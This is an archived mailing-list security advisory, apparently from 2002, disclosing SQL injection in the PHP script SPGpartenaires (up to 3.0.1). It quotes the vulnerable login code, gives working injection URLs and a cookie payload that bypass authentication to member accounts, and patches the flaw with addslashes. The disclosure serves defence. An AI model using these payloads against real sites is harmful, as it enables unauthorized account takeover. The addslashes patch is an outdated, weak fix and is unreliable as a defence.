SPGpartenaires (PHP)

• Previous message: nCipher Support: "nCipher Advisory #6: Access control defects in PKCS#11 keys"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Informations :
°°°°°°°°°°°°°°
Version : ? -> 3.0.1
Website : http://www.scripts-php-gratuits.com
Problem : SQL Injection -> Access to member's accounts

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
modif/ident.php :
--------------------------------------------------
[...]
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND 
motdepasse='".$pass."'";
$re=@mysql_db_query($db_name,$sql,$connect);
$result=@mysql_fetch_array($re);
if(empty($result[0]))
{
header("location: index.php?msg=Identification+incorrecte+!");
}
else
{
setcookie("SPGP",$id."||".$pass,time()+84600,"");
header("location: index2.php");
}
[...]
--------------------------------------------------


modif/delete.php, modif/index2.php, modif/modif.php, modif/modif_suite.php :
--------------------------------------------------------------
<?
if(!isset($SPGP))
{
header("location: index.php?msg=Veuillez+vous+identifier+!");
}
else
{
$inf=explode("||",$SPGP);
[...]
$sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND 
motdepasse='".$inf[1]."'";
$re=@mysql_db_query($db_name,$sql,$connect);
$result=@mysql_fetch_array($re);
if(empty($result[0]))
{
header("location: index.php?msg=Veuillez+vous+identifier+!");
}
[...]
--------------------------------------------------------------


Exploits :
°°°°°°°°°°
http://[target]/modif/ident.php?id=[MEMBERID]&pass='%20OR%20''='
or QUERY :
?SPGP=[ID]%7C%7C'%20OR%20''='
with :
- modif/delete.php
- modif/index2.php
- modif/modif.php
- modif/modif_suite.php


Patch :
°°°°°°°
In modif/ident.php replace the line :
----------------------------------------------------------------
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND 
motdepasse='".$pass."'";
----------------------------------------------------------------
by :
---------------------------------------------------------------
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".addslashes($id)."' AND 
motdepasse='".addslashes($pass)."'";
---------------------------------------------------------------

And in the other files replace the line :
---------------------------------------------------------------
$sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND 
motdepasse='".$inf[1]."'";
---------------------------------------------------------------
by :
---------------------------------------------------------------
$sql="SELECT id FROM SPGPartenaires WHERE id='".addslashes($inf[0])."' AND 
motdepasse='".addslashes($inf[1])."'";
---------------------------------------------------------------

A patch can be found on http://www.phpsecure.org.

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/SPGpartenaires.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSPGpartenaires.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n




_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! 
http://www.msn.fr/msger/default.asp

• Next message: Tamer Sahin: "[SecurityOffice] Polycom Video Conference System Management Server Authentication Bypass Vulnerability"
• Previous message: nCipher Support: "nCipher Advisory #6: Access control defects in PKCS#11 keys"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Dec 20 2002 - 19:54:28 PST